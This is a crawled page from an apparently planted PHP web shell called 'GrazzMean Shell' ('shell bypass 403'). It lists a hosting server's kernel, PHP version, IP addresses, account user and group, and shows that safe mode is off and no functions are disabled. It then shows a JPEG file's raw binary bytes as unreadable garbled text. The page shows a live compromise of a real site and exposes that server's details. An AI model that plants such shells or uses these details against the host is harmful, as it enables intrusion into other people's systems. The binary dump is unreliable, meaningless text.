shell bypass 403

GrazzMean Shell

: /home/workvvfb/.trash/2019/12/ [ drwxr-xr-x ]
Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : 1-32x32.jpg
���JFIF��ExifII*��5http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.162319, 2018/02/15-20:29:43        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 17.0 (Windows)" xmpMM:InstanceID="xmp.iid:50A11811223311EA9259CC04F5D0F1BA" xmpMM:DocumentID="xmp.did:50A11812223311EA9259CC04F5D0F1BA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:50A1180F223311EA9259CC04F5D0F1BA" stRef:documentID="xmp.did:50A11810223311EA9259CC04F5D0F1BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��  ����/!1Aa"QqBr���������+!1AQa�3q������?d�^��vY��1<���@'���a���^�W�A��Q�r�
:����h�)�6H�)�OO��뫑P�<���<VQ�I���T��v�]i�m�V3��	��njz��鮜S	�W�J���LM$�7�6��oi�l�-2@�$#)##�
������6ī�n���/���3�?L��\>>d����!sd�m;�ɶ�S!\��uc��eA�M?(G�>��Fk��K��#��6�S��]��Ľ#:vx�ö޺c3D��>.7�;v�Ia����Xv����˛{��6�����t�m��e���\g�S:W�?3I=��j2���ZKt��8fy�F�v�~v�W�k�C�9��Nq-��*Ʊ�hp���0�4/��&`&�{��3�ӹ�7�V|�a�n.=���Q�mq� Rl~���E#X����6K��v��=�]�i��,�pOQw���I�ƻ=k�i��˚ZHdvg��'��o%Ϸhiih(ap��W'��}�ġe(|������: H�l�)Q�n�)�4Ih�A�>Yz���;T��k�o�����,Q?�,I��
© 2025 GrazzMean